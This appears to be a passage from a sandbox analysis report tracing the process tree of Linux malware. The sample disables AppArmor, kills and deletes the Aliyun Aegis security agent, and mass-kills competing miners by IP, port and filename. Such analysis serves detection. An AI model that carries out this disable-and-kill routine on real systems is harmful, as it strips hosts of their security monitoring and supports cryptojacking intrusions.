  PID:1693
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1693
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1693
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1693
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1693
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:1693
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  PID:1706
- - /lib/systemd/systemd-sysv-install
    /lib/systemd/systemd-sysv-install disable apparmor
    3⤵
    PID:1710
  - - /usr/bin/getopt
      getopt -o r: --long root: -- disable apparmor
      4⤵
      PID:1711
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d apparmor defaults
      4⤵
      PID:1712
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1713
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1713
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1713
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1713
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1713
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1713
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d apparmor disable
      4⤵
      Flushes firewall rules
      PID:1717
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1718
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1718
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1718
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1718
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1718
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Disables AppArmor
        
        PID:1718
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:1722
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1726
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1727
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    PID:1728
- - /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:1734
- - /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    - Disables AppArmor
    PID:1733
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1722
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1722
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1722
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1722
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1722
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:1722
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  PID:1738
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1746
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1745
- /bin/grep
  grep aegis
  2⤵
  PID:1744
- /bin/grep
  grep -v grep
  2⤵
  PID:1743
- /bin/ps
  ps aux
  2⤵
  PID:1742
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1754
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1753
- /bin/grep
  grep Yun
  2⤵
  PID:1752
- /bin/grep
  grep -v grep
  2⤵
  PID:1751
- /bin/ps
  ps aux
  2⤵
  PID:1750
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:1755
- /bin/mkdir
  mkdir /usr/share -p
  2⤵
  PID:1756
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1761
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1760
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1759
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1758
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1766
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1765
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1764
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1763
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1772
- /bin/grep
  grep -v -
  2⤵
  PID:1771
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1770
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1769
- /bin/grep
  grep :443
  2⤵
  PID:1768
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1778
- /bin/grep
  grep -v -
  2⤵
  PID:1777
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1776
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1775
- /bin/grep
  grep :23
  2⤵
  PID:1774
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1784
- /bin/grep
  grep -v -
  2⤵
  PID:1783
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1782
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1781
- /bin/grep
  grep :443
  2⤵
  PID:1780
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1790
- /bin/grep
  grep -v -
  2⤵
  PID:1789
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1788
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1787
- /bin/grep
  grep :143
  2⤵
  PID:1786
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1796
- /bin/grep
  grep -v -
  2⤵
  PID:1795
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1794
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1793
- /bin/grep
  grep :2222
  2⤵
  PID:1792
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1802
- /bin/grep
  grep -v -
  2⤵
  PID:1801
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1800
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1799
- /bin/grep
  grep :3333
  2⤵
  PID:1798
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1808
- /bin/grep
  grep -v -
  2⤵
  PID:1807
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1806
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1805
- /bin/grep
  grep :3389
  2⤵
  PID:1804
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1814
- /bin/grep
  grep -v -
  2⤵
  PID:1813
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1812
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1811
- /bin/grep
  grep :5555
  2⤵
  PID:1810
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1820
- /bin/grep
  grep -v -
  2⤵
  PID:1819
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1818
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1817
- /bin/grep
  grep :6666
  2⤵
  PID:1816
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1826
- /bin/grep
  grep -v -
  2⤵
  PID:1825
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1824
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1823
- /bin/grep
  grep :6665
  2⤵
  PID:1822
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1832
- /bin/grep
  grep -v -
  2⤵
  PID:1831
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1830
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1829
- /bin/grep
  grep :6667
  2⤵
  PID:1828
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1838
- /bin/grep
  grep -v -
  2⤵
  PID:1837
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1836
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1835
- /bin/grep
  grep :7777
  2⤵
  PID:1834
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1844
- /bin/grep
  grep -v -
  2⤵
  PID:1843
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1842
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1841
- /bin/grep
  grep :8444
  2⤵
  PID:1840
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1850
- /bin/grep
  grep -v -
  2⤵
  PID:1849
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1848
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1847
- /bin/grep
  grep :3347
  2⤵
  PID:1846
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1855
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1854
- /bin/grep
  grep :3333
  2⤵
  PID:1853
- /bin/grep
  grep -v grep
  2⤵
  PID:1852
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1851
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1860
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1859
- /bin/grep
  grep :5555
  2⤵
  PID:1858
- /bin/grep
  grep -v grep
  2⤵
  PID:1857
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1856
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1865
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1864
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1863
- /bin/grep
  grep -v grep
  2⤵
  PID:1862
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1861
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1870
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1869
- /bin/grep
  grep log_
  2⤵
  PID:1868
- /bin/grep
  grep -v grep
  2⤵
  PID:1867
- /bin/ps
  ps aux
  2⤵
  PID:1866
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1875
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1874
- /bin/grep
  grep systemten
  2⤵
  PID:1873
- /bin/grep
  grep -v grep
  2⤵
  PID:1872
- /bin/ps
  ps aux
  2⤵
  PID:1871
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1880
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1881
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1881
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1881
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1881
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1881
- - /bin/kill
    kill -9 14
    3⤵
    PID:1881
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1879
- /bin/grep
  grep netns
  2⤵
  PID:1878
- /bin/grep
  grep -v grep
  2⤵
  PID:1877
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1876
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1886
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1885
- /bin/grep
  grep voltuned
  2⤵
  PID:1884
- /bin/grep
  grep -v grep
  2⤵
  PID:1883
- /bin/ps
  ps aux
  2⤵
  PID:1882
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1891
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1890
- /bin/grep
  grep darwin
  2⤵
  PID:1889
- /bin/grep
  grep -v grep
  2⤵
  PID:1888
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1887
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1896
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1895
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1894
- /bin/grep
  grep -v grep
  2⤵
  PID:1893
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1892
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1901
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1900
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1899
- /bin/grep
  grep -v grep
  2⤵
  PID:1898
- /bin/ps
  ps aux
  2⤵
  PID:1897
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1906
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1905
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1904
- /bin/grep
  grep -v grep
  2⤵
  PID:1903
- /bin/ps
  ps aux
  2⤵
  PID:1902
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1911
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1910
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1909
- /bin/grep
  grep -v grep
  2⤵
  PID:1908
- /bin/ps
  ps aux
  2⤵
  PID:1907
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1916
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1915
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1914
- /bin/grep
  grep -v grep
  2⤵
  PID:1913
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1912
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1921
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1920
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1919
- /bin/grep
  grep -v grep
  2⤵
  PID:1918
- /bin/ps
  ps aux
  2⤵
  PID:1917
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1926
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1925
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1924
- /bin/grep
  grep -v grep
  2⤵
  PID:1923
- /bin/ps
  ps aux
  2⤵
  PID:1922
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1931
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1930
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1929
- /bin/grep
  grep -v grep
  2⤵
  PID:1928
- /bin/ps
  ps aux
  2⤵
  PID:1927
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1936
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1935
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1934
- /bin/grep
  grep -v grep
  2⤵
  PID:1933
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1932
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1941
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1940
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1939
- /bin/grep
  grep -v grep
  2⤵
  PID:1938
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1937
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1946
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1945
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1944
- /bin/grep
  grep -v grep
  2⤵
  PID:1943
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1942
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1951
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1950
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1949
- /bin/grep
  grep -v grep
  2⤵
  PID:1948
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1947
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1956
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1955
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1954
- /bin/grep
  grep -v grep
  2⤵
  PID:1953
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1952
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1961
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1960
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1959
- /bin/grep
  grep -v grep
  2⤵
  PID:1958
- /bin/ps
  ps aux
  2⤵
  PID:1957
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1966
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1965
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1964
- /bin/grep
  grep -v grep
  2⤵
  PID:1963
- /bin/ps
  ps aux
  2⤵
  PID:1962
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1971
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1970
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1969
- /bin/grep
  grep -v grep
  2⤵
  PID:1968
- /bin/ps
  ps aux
  2⤵
  PID:1967
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1976
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1975
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1974
- /bin/grep
  grep -v grep
  2⤵
  PID:1973
- /bin/ps
  ps aux
  2⤵
  PID:1972
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1981
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1980
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1979
- /bin/grep
  grep -v grep
  2⤵
  PID:1978
- /bin/ps
  ps aux
  2⤵
  PID:1977
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1986
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1985
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1984
- /bin/grep
  grep -v grep
  2⤵
  PID:1983
- /bin/ps
  ps aux
  2⤵
  PID:1982
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1991
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1990
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1989
- /bin/grep
  grep -v grep
  2⤵
  PID:1988
- /bin/ps
  ps aux
  2⤵
  PID:1987
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1996
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1995
- /bin/grep
  grep svc
  2⤵
  PID:1994
- /bin/grep
  grep -v grep
  2⤵
  PID:1993
- /bin/ps
  ps aux
  2⤵
  PID:1992
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2001
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2000
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1999
- /bin/grep
  grep -v grep
  2⤵
  PID:1998
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1997
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2006
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2005
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:2004
- /bin/grep
  grep -v grep
  2⤵
  PID:2003
- /bin/ps
  ps aux
  2⤵
  PID:2002
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2011
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2010
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:2009
- /bin/grep
  grep -v grep
  2⤵
  PID:2008
- /bin/ps
  ps aux
  2⤵
  PID:2007
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2016
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2015
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:2014
- /bin/grep
  grep -v grep
  2⤵
  PID:2013
- /bin/ps
  ps aux
  2⤵
  PID:2012
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2021
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2020
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:2019
- /bin/grep
  grep -v grep
  2⤵
  PID:2018
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2017
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2026
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2025
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:2024
- /bin/grep
  grep -v grep
  2⤵
  PID:2023
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2022
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2031
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2030
- /bin/grep
  grep http_0xCC030
  2⤵
  - Disables SELinux
  PID:2029
- /bin/grep
  grep -v grep
  2⤵
  PID:2028
- /bin/ps
  ps aux
  2⤵
  PID:2027
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2036
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2035
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2034
- /bin/grep
  grep -v grep
  2⤵
  PID:2033
- /bin/ps
  ps aux
  2⤵
  PID:2032
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2041
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2040
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2039
- /bin/grep
  grep -v grep
  2⤵
  PID:2038
- /bin/ps
  ps aux
  2⤵
  PID:2037
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2046
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2045
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2044
- /bin/grep
  grep -v grep
  2⤵
  PID:2043
- /bin/ps
  ps aux
  2⤵
  PID:2042
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2051
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2050
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2049
- /bin/grep
  grep -v grep
  2⤵
  PID:2048
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2047
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2056
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2055
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2054
- /bin/grep
  grep -v grep
  2⤵
  PID:2053
- /bin/ps
  ps aux
  2⤵
  PID:2052
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2060
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2059
- /bin/grep
  grep -v grep
  2⤵
  PID:2058
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2057
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2065
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2064
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2063
- /bin/grep
  grep -v grep
  2⤵
  PID:2062
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2061
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2070
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2069
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2068
- /bin/grep
  grep -v grep
  2⤵
  PID:2067
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2066
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2074
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2073
- /bin/grep
  grep -v grep
  2⤵
  PID:2072
- /bin/ps
  ps aux
  2⤵
  PID:2071
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2079
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2078
- /bin/grep
  grep -v grep
  2⤵
  PID:2077
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2076
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2085
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2084
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2083
- /bin/grep
  grep -v grep
  2⤵
  PID:2082
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2081
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2090
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2089
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2088
- /bin/grep
  grep -v grep
  2⤵
  PID:2087
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2086
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2096
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2095
- /bin/grep
  grep "]"
  2⤵
  PID:2094
- /bin/grep
  grep -v aux
  2⤵
  PID:2093
- /bin/grep
  grep -v grep
  2⤵
  PID:2092
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2091
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2101
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2100
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2099
- /bin/grep
  grep -v grep
  2⤵
  PID:2098
- /bin/ps
  ps aux
  2⤵
  PID:2097
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2106
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2105
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2104
- /bin/grep
  grep -v grep
  2⤵
  PID:2103
- /bin/ps
  ps aux
  2⤵
  PID:2102
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2111
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2110
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2109
- /bin/grep
  grep -v grep
  2⤵
  PID:2108
- /bin/ps
  ps aux
  2⤵
  PID:2107
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2118
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2117
- /bin/grep
  grep -v _
  2⤵
  PID:2116
- /bin/grep
  grep -v -
  2⤵
  PID:2115
- /bin/grep
  grep -v /
  2⤵
  PID:2114
- /bin/grep
  grep -v grep
  2⤵
  PID:2113
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2112
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2123
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2122
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2121
